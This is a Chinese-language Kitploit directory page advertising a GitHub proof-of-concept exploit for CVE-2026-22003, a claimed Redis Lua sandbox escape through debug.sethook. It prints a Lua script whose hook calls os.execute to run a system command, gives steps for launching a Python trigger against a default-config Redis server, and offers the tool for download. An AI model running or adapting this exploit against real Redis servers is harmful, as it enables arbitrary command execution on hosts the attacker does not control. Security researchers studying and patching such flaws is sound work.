Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook- — 针对 CVE-2026-22003 的概念验证漏洞利用程序,演示通过 debug.sethook 实现 Redis Lua 沙箱逃逸,以执行任意系统命令。 | Kitploit
工具/GitHubGitHub/george0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-
权限提升漏洞分析漏洞利用数据库安全对抗性攻击
GitHubgeorge0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-

CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook-

针对 CVE-2026-22003 的概念验证漏洞利用程序,演示通过 debug.sethook 实现 Redis Lua 沙箱逃逸,以执行任意系统命令。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
16天前尚未审核

CVE-2026-22003 – 通过 debug.sethook 的 Redis Lua 沙箱逃逸

程序代码(Lua + Python 触发器)

root@kitploit:~
-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
  debug.sethook(function() 
    -- This hook runs in a privileged context
    os.execute("id > /tmp/redis_escape") 
  end, "r")
  local a = 1
end
return escape()

CVE-2026-22003 – 通过 debug.sethook 的 Redis Lua 沙箱逃逸

Severity: Critical

概述

Redis Lua 沙箱未正确禁用 debug.sethook 函数。能够运行 Lua 脚本的攻击者可以安装一个在特权上下文中执行的钩子,从而逃逸沙箱并执行任意系统命令。

漏洞详情

  • **类型:**沙箱逃逸
  • **影响:**Redis 主机上的远程代码执行。
  • **根本原因:**Lua 环境的调试库仍然可访问,允许钩子调用 os.execute 或类似函数。

漏洞利用演示

  1. 启动一个 Redis 服务器(使用允许 EVAL 的默认配置)。
  2. 运行漏洞利用程序:
    root@kitploit:~
    pip install redis
    python trigger_redis_sandbox_escape.py
    

已创建 /tmp/redis_escape 文件,证明命令执行成功。


下载工具